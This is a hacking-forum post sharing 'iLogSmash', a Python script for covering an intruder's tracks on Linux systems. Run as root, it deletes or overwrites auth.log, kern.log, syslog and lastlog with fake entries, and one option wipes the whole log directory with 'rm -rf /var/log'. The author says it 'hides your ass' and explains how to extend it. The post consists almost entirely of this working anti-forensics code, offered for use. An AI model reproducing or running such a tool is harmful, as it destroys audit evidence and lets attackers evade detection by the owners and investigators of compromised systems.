iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (2)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
iLogSmash
  • chroniccommand
    Posts: 1,389
    So I've coded up a little 'project'. Feel free to contribute to your liking and add anything. It's a python log remover/alterer. Most log remover programs just remove the logs, this one has an option to alter the logs(to make it less suspicious). Of course, the preset log file text is shitty(One line each). But you can alter it to make it look more log-ish. 


    #!/usr/bin/python

    import sys, os
    isroot = os.getuid()

    #Global declarations such as log file locations. Add more to fit your needs
    logs = ['/var/log/auth.log', '/var/log/kern.log', '/var/log/boot', '/var/log/aptitude', '/var/log/syslog']

    #Logfile text for option 2(Alter logs). Yes, IK,  not the best fake logs. You can make your own if you want.
    log1txt = \"linux CRON[10025]: pam_unix: session closed for root\n\"
    log2txt = \"Linux kernel: Kernel logging (proc) stopped.\n\"
    log3txt = \"/dev/loop0: clean, 320083/1648320 files, 4462541/6590464 blocks\n\"
    log4txt = \"Aptitude 0.4.11.11: log report\n\"
    log5txt = \"Jan  6 06:31:50 vandal rsyslogd: [origin software=rslogds\n\"

    print(\"\"\"
     _ _                  _____                     _     
    (_) |                / ____|                   | |    
     _| |     ___   __ _| (___  _ __ ___   __ _ ___| |__  
    | | |    / _ \ / _` |\___ \| '_ ` _ \ / _` / __| '_ \ 
    | | |___| (_) | (_| |____) | | | | | | (_| \__ \ | | |
    |_|______\___/ \__, |_____/|_| |_| |_|\__,_|___/_| |_|
                    __/ |                                 
                   |___/                                  
    Author: Chroniccommand
    http://iexploit.org
    Log smasher. Hides your ass

    \"\"\")
    print(\"Logs loaded: \")
    print(logs)

    def main():
        print(\"\n1 - Delete logs(Alert level - High)\n2 - Alter logs(Alert level - Medium\n3 - Remove all logs(Alert level - VERY HIGH\n4 - Remove lastlog\n5 - Info\n6 - Exit\")
        command = raw_input('Choice: ')
        if command == '1':
            print(\"[+]Deleting logs...\")
    	try:
    	    os.remove(logs[0])
    	    os.remove(logs[1])
    	    os.remove(logs[2])
    	    os.remove(logs[3])
    	    os.remove(logs[4])
    	    print(\"[-]Log's removed\n\")
    	    main()
    	except:
    	    print(\"Error deleting logs\n\")
    	    main()

        elif command == '2':
    	print(\"[+]Altering logs...\n\")
    	os.remove(logs[0])
    	os.remove(logs[1])
    	os.remove(logs[2])
    	os.remove(logs[3])
    	os.remove(logs[4])
    	file = open(logs[0], 'a')
    	file.write(log1txt)
    	file = open(logs[1], 'a')
    	file.write(log2txt)
    	file = open(logs[2], 'a')
    	file.write(log3txt)
    	file = open(logs[3], 'a')
    	file.write(log4txt)
    	file = open(logs[4], 'a')
    	file.write(log5txt)   
            print(\"[-]Log's altered\n\")
            main()
    	

        elif command == '3':
    	print(\"Warning: About to delete all logs. This can be VERY suspicious. Continue?\")
    	yesorno = raw_input('Y/N ')
    	if yesorno == 'Y':
    	    try:
    	        print(\"[+]Removing all logs...\n\")
    	        os.system('rm -rf /var/log')
    	        print(\"[-]All logs removed\n\")
    		main()
    	    except:
    		print(\"Error removing all logs\n\")
    		main()
    	elif yesorno == 'N':
    		main()
    	
            else:
              print(\"Please select either Y or N\")
    	  main()

        elif command == '4':
            try:
                print(\"[+]Removing /var/log/lastlog...\")
    	    os.remove('/var/log/lastlog')
    	    print(\"[-]Lastlog removed\")
    	    main()    
    	except:
    	    print(\"Error removing lastlog\n\")
    	    main()
        elif command == '5':
    	print(\"iLogSmash is coded by chroniccommand. Visit http://iexploit.org for more awesomness.\nThis script removes/alters logs on (most) *nix systems. Defaults are auth.log,boot,kern.log,aptitude,syslog.\nChoice 1 deletes the logs loaded in the list logs. This list can be edited to alter/delete more logs.\nChoice 2 alters logs. It first removes them, then replaces them with the test in log1txt etc.\nChoice 3 removes all logs. This can be quite suspicious so only use if you need to.\nChoice 4 removes lastlog. This is the log that logs all connections, who their from, from what tty etc. This is an executable so you can't really edit it(Unless you make a fake one).\n\") 
    	main()

    def root():
        if isroot == 0:
    	main()
        else:
    	print(\"You must run this as root\n\")
            sys.exit()

    root()

    If you want to edit log file locations, edit them in the list on the top(logs). Of course then you must edit the alterer/remover. This is easy. Say you added another log, /var/log/pwn.log. Just add these to the remover/alter section:

    if command == '1':
            print(\"[+]Deleting logs...\")
    	try:
    	    os.remove(logs[0])
    	    os.remove(logs[1])
    	    os.remove(logs[2])
    	    os.remove(logs[3])
    	    os.remove(logs[4])
                os.remove(logs[5])
    	    print(\"[-]Log's removed\n\")
    	    main()
    	except:
    	    print(\"Error deleting logs\n\")
    	    main()

    And the alterer:

    elif command == '2':
    	print(\"[+]Altering logs...\n\")
    	os.remove(logs[0])
    	os.remove(logs[1])
    	os.remove(logs[2])
    	os.remove(logs[3])
    	os.remove(logs[4])
            os.remove(logs[5])
    	file = open(logs[0], 'a')
    	file.write(log1txt)
    	file = open(logs[1], 'a')
    	file.write(log2txt)
    	file = open(logs[2], 'a')
    	file.write(log3txt)
    	file = open(logs[3], 'a')
    	file.write(log4txt)
    	file = open(logs[4], 'a')
    	file.write(log5txt)   
            file = open(logs[5], 'a')
            file.write(log6txt)
            print(\"[-]Log's altered\n\")
            main()

    Note: Sometimes the code blocks on myBB fuck up the code, so I've uploaded it for you.
    http://www.mediafire.com/?voah12ofwo5gr9m
Add a Comment